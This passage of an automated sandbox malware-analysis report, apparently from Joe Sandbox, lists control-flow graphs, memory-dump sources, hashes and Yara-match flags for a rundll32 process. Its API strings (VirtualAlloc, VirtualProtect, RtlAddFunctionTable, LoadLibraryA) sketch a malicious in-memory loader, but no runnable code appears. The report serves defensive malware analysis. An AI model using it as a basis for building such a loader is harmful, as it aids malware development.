                                                                                                                                      control_flow_graph 0 18475ee0000-18475ee0460 call 18475ee0aa8 * 2 VirtualAlloc 22 18475ee0462-18475ee0466 0->22 23 18475ee048a-18475ee0494 0->23 24 18475ee0468-18475ee0488 22->24 26 18475ee0a91-18475ee0aa6 23->26 27 18475ee049a-18475ee049e 23->27 24->23 24->24 27->26 28 18475ee04a4-18475ee04a8 27->28 28->26 29 18475ee04ae-18475ee04b2 28->29 29->26 30 18475ee04b8-18475ee04bf 29->30 30->26 31 18475ee04c5-18475ee04d2 30->31 31->26 32 18475ee04d8-18475ee04e1 31->32 32->26 33 18475ee04e7-18475ee04f4 32->33 33->26 34 18475ee04fa-18475ee0507 33->34 35 18475ee0531-18475ee0567 GetNativeSystemInfo 34->35 36 18475ee0509-18475ee0511 34->36 35->26 38 18475ee056d-18475ee0589 VirtualAlloc 35->38 37 18475ee0513-18475ee0518 36->37 39 18475ee0521 37->39 40 18475ee051a-18475ee051f 37->40 41 18475ee05a0-18475ee05ac 38->41 42 18475ee058b-18475ee059e 38->42 44 18475ee0523-18475ee052f 39->44 40->44 43 18475ee05af-18475ee05b2 41->43 42->41 45 18475ee05c1-18475ee05db 43->45 46 18475ee05b4-18475ee05bf 43->46 44->35 44->37 48 18475ee05dd-18475ee05e2 45->48 49 18475ee061b-18475ee0622 45->49 46->43 50 18475ee05e4-18475ee05ea 48->50 51 18475ee06db-18475ee06e2 49->51 52 18475ee0628-18475ee062f 49->52 53 18475ee05ec-18475ee0609 50->53 54 18475ee060b-18475ee0619 50->54 56 18475ee06e8-18475ee06f9 51->56 57 18475ee0864-18475ee086b 51->57 52->51 55 18475ee0635-18475ee0642 52->55 53->53 53->54 54->49 54->50 55->51 60 18475ee0648-18475ee064f 55->60 61 18475ee0702-18475ee0705 56->61 58 18475ee0871-18475ee087f 57->58 59 18475ee0917-18475ee0929 57->59 64 18475ee090e-18475ee0911 58->64 62 18475ee092f-18475ee0937 59->62 63 18475ee0a07-18475ee0a1a 59->63 65 18475ee0654-18475ee0658 60->65 66 18475ee06fb-18475ee06ff 61->66 67 18475ee0707-18475ee070a 61->67 69 18475ee093b-18475ee093f 62->69 81 18475ee0a40-18475ee0a4a 63->81 82 18475ee0a1c-18475ee0a27 63->82 64->59 68 18475ee0884-18475ee08a9 64->68 70 18475ee06c0-18475ee06ca 65->70 66->61 71 18475ee070c-18475ee071d 67->71 72 18475ee0788-18475ee078e 67->72 97 18475ee08ab-18475ee08b1 68->97 98 18475ee0907-18475ee090c 68->98 77 18475ee09ec-18475ee09fa 69->77 78 18475ee0945-18475ee095a 69->78 75 18475ee06cc-18475ee06d2 70->75 76 18475ee065a-18475ee0669 70->76 74 18475ee0794-18475ee07a2 71->74 79 18475ee071f-18475ee0720 71->79 72->74 83 18475ee085d-18475ee085e 74->83 84 18475ee07a8 74->84 75->65 85 18475ee06d4-18475ee06d5 75->85 89 18475ee067a-18475ee067e 76->89 90 18475ee066b-18475ee0678 76->90 77->69 91 18475ee0a00-18475ee0a01 77->91 87 18475ee095c-18475ee095e 78->87 88 18475ee097b-18475ee097d 78->88 80 18475ee0722-18475ee0784 79->80 80->80 92 18475ee0786 80->92 95 18475ee0a4c-18475ee0a54 81->95 96 18475ee0a7b-18475ee0a8e 81->96 93 18475ee0a38-18475ee0a3e 82->93 83->57 94 18475ee07ae-18475ee07d4 84->94 85->51 99 18475ee0960-18475ee096c 87->99 100 18475ee096e-18475ee0979 87->100 102 18475ee09a2-18475ee09a4 88->102 103 18475ee097f-18475ee0981 88->103 104 18475ee0680-18475ee068a 89->104 105 18475ee068c-18475ee0690 89->105 101 18475ee06bd-18475ee06be 90->101 91->63 92->74 93->81 115 18475ee0a29-18475ee0a35 93->115 131 18475ee07d6-18475ee07d9 94->131 132 18475ee0835-18475ee0839 94->132 95->96 116 18475ee0a56-18475ee0a79 RtlAddFunctionTable 95->116 96->26 113 18475ee08b3-18475ee08b9 97->113 114 18475ee08bb-18475ee08c8 97->114 98->64 117 18475ee09be-18475ee09bf 99->117 100->117 101->70 111 18475ee09ac-18475ee09bb 102->111 112 18475ee09a6-18475ee09aa 102->112 106 18475ee0983-18475ee0987 103->106 107 18475ee0989-18475ee098b 103->107 108 18475ee06b6-18475ee06ba 104->108 109 18475ee0692-18475ee06a3 105->109 110 18475ee06a5-18475ee06a9 105->110 106->117 107->102 118 18475ee098d-18475ee098f 107->118 108->101 109->108 110->101 119 18475ee06ab-18475ee06b3 110->119 111->117 112->117 121 18475ee08ea-18475ee08fe 113->121 122 18475ee08d3-18475ee08e5 114->122 123 18475ee08ca-18475ee08d1 114->123 115->93 116->96 120 18475ee09c5-18475ee09cb 117->120 126 18475ee0991-18475ee0997 118->126 127 18475ee0999-18475ee09a0 118->127 119->108 128 18475ee09cd-18475ee09d3 120->128 129 18475ee09d9-18475ee09e9 VirtualProtect 120->129 121->98 139 18475ee0900-18475ee0905 121->139 122->121 123->122 123->123 126->117 127->120 128->129 129->77 136 18475ee07e3-18475ee07f0 131->136 137 18475ee07db-18475ee07e1 131->137 133 18475ee083b 132->133 134 18475ee0844-18475ee0850 132->134 133->134 134->94 138 18475ee0856-18475ee0857 134->138 141 18475ee07f2-18475ee07f9 136->141 142 18475ee07fb-18475ee080d 136->142 140 18475ee0812-18475ee082c 137->140 138->83 139->97 140->132 144 18475ee082e-18475ee0833 140->144 141->141 141->142 142->140 144->131
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.282140357.0000018475EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018475EE0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_18475ee0000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                      • API String ID: 394283112-2517549848
                                                                                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction ID: d66d5cbf4c6a21e88ebf2cd508ac9c29ff76efde754c7275e90d666b02b0403a
                                                                                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction Fuzzy Hash: 4E72D730514B898BEB69DF28C8867F9B7E1FB94304F11862DE88AC7251DF38D645CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                                      • API String ID: 0-464535774
                                                                                                                                      • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                      • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                                      • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                      • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                                      • API String ID: 0-3528011396
                                                                                                                                      • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                      • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                                      • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                      • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 229 180021bdf-180021bee 221->229 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 230 1800219e4-1800219ee 227->230 231 180021681-180021686 227->231 229->217 230->217 233 1800219d5-1800219df call 18001dfb4 231->233 234 18002168c-180021691 231->234 233->217 235 180021697-18002169c 234->235 236 18002190c-1800219a5 call 18000abac 234->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 247 1800219b2-1800219c6 243->247 248 1800219cb-1800219d0 243->248 244->224 247->217 248->217
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                                      • API String ID: 0-3036092626
                                                                                                                                      • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                      • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                                      • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                      • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 262 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->262 263 18000cca0-18000cca5 256->263 290 18000cfb4-18000d00a call 1800194a4 257->290 264 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->264 265 18000c64e-18000c653 258->265 293 18000cc28-18000cc85 call 1800194a4 259->293 304 18000cedc-18000cf26 call 1800194a4 262->304 266 18000cd35-18000cdce call 18000703c call 18001c32c 263->266 267 18000ccab-18000ccb0 263->267 264->253 269 18000c9c1-18000ca52 call 18002870c call 18001c32c 265->269 270 18000c659-18000c65e 265->270 309 18000cdd3-18000ce2e call 1800194a4 266->309 274 18000ccb6-18000cd30 call 180021434 267->274 275 18000d00f-18000d014 267->275 312 18000ca57-18000caa0 call 1800194a4 269->312 277 18000c664-18000c669 270->277 278 18000c8bb-18000c963 call 180002610 call 18001c32c 270->278 274->253 275->253 291 18000d01a-18000d020 275->291 286 18000c7b2-18000c85a call 180019618 call 18001c32c 277->286 287 18000c66f-18000c674 277->287 317 18000c968-18000c9bc call 1800194a4 278->317 324 18000c85f-18000c8b6 call 1800194a4 286->324 287->275 297 18000c67a-18000c73d call 180002178 call 18001c32c 287->297 290->275 293->253 326 18000c742-18000c7ad call 1800194a4 297->326 304->253 309->253 312->253 317->253 324->253 326->253
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +#;)$K'$sf$w\H
                                                                                                                                      • API String ID: 0-1051058546
                                                                                                                                      • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                      • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                      • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                      • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: <4P$<8$<w.
                                                                                                                                      • API String ID: 0-1030867500
                                                                                                                                      • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                      • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                      • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                      • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                      • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                                      • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                      • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                                      • API String ID: 0-2447245168
                                                                                                                                      • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                      • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                                      • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                      • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 581 1800061ab-1800061b0 570->581 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 577 180005a25-180005a2a 572->577 578 180005da6-180005fb1 call 1800093f0 572->578 573->569 579 1800061bb-18000625a call 180001b1c 577->579 580 180005a30-180005a35 577->580 593 180005fc3-180005fc8 578->593 594 180005fb3-180005fbe 578->594 587 18000625f-180006271 579->587 584 180005a3b-180005a40 580->584 585 180005d7e-180005d8c 580->585 586 1800061b6 581->586 581->587 590 180005a46-180005a4b 584->590 591 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 584->591 592 180005d92-180005d96 585->592 586->569 595 180005a51-180005a56 590->595 596 180005ad8-180005b68 call 18000abac 590->596 591->569 597 180005d98-180005da1 592->597 598 180005d8e-180005d8f 592->598 593->569 594->569 595->581 600 180005a5c-180005ad3 call 180007958 595->600 596->587 607 180005b6e-180005b73 596->607 597->569 598->592 600->569 607->569
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                      • API String ID: 0-2100131636
                                                                                                                                      • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                      • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                      • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                      • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                      • API String ID: 0-2401169580
                                                                                                                                      • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                      • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                      • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                      • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                      • API String ID: 0-1318892062
                                                                                                                                      • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                      • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                      • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                      • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                      • API String ID: 0-3477398917
                                                                                                                                      • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                      • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                      • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                      • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: JQ$k&($t$v$x\J
                                                                                                                                      • API String ID: 0-1134872184
                                                                                                                                      • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                      • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                      • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                      • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: R$)H8$?rIc$L==$V
                                                                                                                                      • API String ID: 0-2512384441
                                                                                                                                      • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                      • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                      • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                      • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
